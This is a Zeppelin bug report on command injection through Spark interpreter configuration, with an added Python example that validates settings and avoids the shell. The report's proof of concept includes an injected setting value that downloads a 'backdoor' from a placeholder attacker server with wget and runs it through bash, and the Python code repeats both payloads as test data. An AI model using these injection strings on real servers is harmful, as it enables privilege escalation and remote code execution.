Zeppelin / ZEPPELIN-4194

System command injection via Spark Interpreter configuration


    Details

    • Type: Bug
    • Status: Open
    • Priority: Minor
    • Resolution: Unresolved
    • Affects Version/s: 0.8.0
    • Fix Version/s: None
    • Component/s: zeppelin-server

      Description

      Hi

      We have found that system commands can be injected into Spark interpreter settings (maybe other interpreters' settings are affected as well). This injection will be executed whenever any Spark job runs.

      This injection could be a security issue in environments where users have permissions to change interpreter settings; then it leads to local privilege escalation (normally a user can execute notes with a special user that is used for the interpreter, but the injected commands will be executed as the zeppelin user).

      PoC:

      (this example will also crash Spark jobs because the command line is truncated)

      spark.executor.memory=16g;touch${IFS%?}/tmp/test

      or another example; in this case Spark jobs will be executed normally without interruption:

      spark.driver.cores=2`{wget,-O,/tmp/x,http://attacker_server:443/backdoor};{chmod,0755,/tmp/x};{bash,-c,/tmp/x}`

      Expectation:

      Parameters should be validated and filtered to prevent injections into the command line.
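The following is an added illustration of the validation the report asks for; it is not Zeppelin's code and not the reporter's. It assumes the interpreter settings end up as `--conf key=value` arguments to spark-submit (the report does not say exactly how they are rendered), and the allow-list patterns, the `validate_setting`/`build_spark_submit_argv` names and the embedded payloads (copied from the PoC above as constructed test data) are this example's own. It shows the string-concatenation pattern the injection relies on next to a version that rejects the PoC values and keeps settings off a shell entirely.

```python
"""Added example (not Zeppelin's code): rejecting shell metacharacters in
interpreter settings and keeping them off a shell command line.

Assumption: settings are rendered as `--conf key=value` arguments to
spark-submit. The allow-lists below are this example's own choices."""
import re
import shlex

# Spark property names are dotted identifiers (spark.executor.memory, ...).
_KEY_RE = re.compile(r"^spark(\.[A-Za-z0-9_-]+)+$")
# Characters seen in ordinary values (16g, 2, /tmp/x, a.jar,b.jar, hdfs://...).
# Everything the PoCs rely on (; ` $ { } % ? whitespace) is outside this set.
_VALUE_CHARS = frozenset(
    "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_.-/:=,@+"
)

# The two payloads from the report, embedded as constructed test data so the
# checks run offline; nothing here executes them.
POC_PAYLOADS = {
    "spark.executor.memory": "16g;touch${IFS%?}/tmp/test",
    "spark.driver.cores": "2`{wget,-O,/tmp/x,http://attacker_server:443/backdoor}"
                          ";{chmod,0755,/tmp/x};{bash,-c,/tmp/x}`",
}


def validate_setting(key, value):
    """Return None if key=value may go on the command line, else the reason."""
    if not _KEY_RE.match(key):
        return f"property name not allowed: {key!r}"
    bad = sorted({c for c in value if c not in _VALUE_CHARS})
    if bad:
        return f"disallowed characters {bad} in value of {key}"
    return None


def vulnerable_command(settings):
    """The pattern the report exploits: values pasted into one string that a
    shell later parses. Returned as a string only, never executed here."""
    return "spark-submit " + " ".join(f"--conf {k}={v}" for k, v in settings.items())


def build_spark_submit_argv(settings):
    """Hardened: validate each pair, then return an argv list for an exec-style
    launch (no shell, so ; ` $ and brace expansion are never interpreted)."""
    argv = ["spark-submit"]
    for key, value in settings.items():
        reason = validate_setting(key, value)
        if reason is not None:
            raise ValueError(reason)
        argv += ["--conf", f"{key}={value}"]
    return argv


def build_shell_command(settings):
    """If a shell string is unavoidable, quote each validated token; shlex.quote
    leaves plain tokens alone and single-quotes anything else."""
    return " ".join(shlex.quote(t) for t in build_spark_submit_argv(settings))


if __name__ == "__main__":
    for key, value in POC_PAYLOADS.items():
        print(key, "->", validate_setting(key, value))
    print(build_shell_command({"spark.executor.memory": "16g", "spark.driver.cores": "2"}))
```

The character allow-list is what stops the two PoC values (`;`, `${IFS%?}`, backticks and the `{a,b,c}` brace expansion are all outside it); passing an argv list to an exec-style launcher instead of a shell string is what removes the interpretation step altogether, and `shlex.quote` is only the fallback when a shell string cannot be avoided. Which Spark properties a non-admin user may set at all is a separate decision that character filtering does not make for you.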

            People

            • Assignee: Unassigned
            • Reporter: eik00d Alexey Sintsov
            • Votes: 0
            • Watchers: 3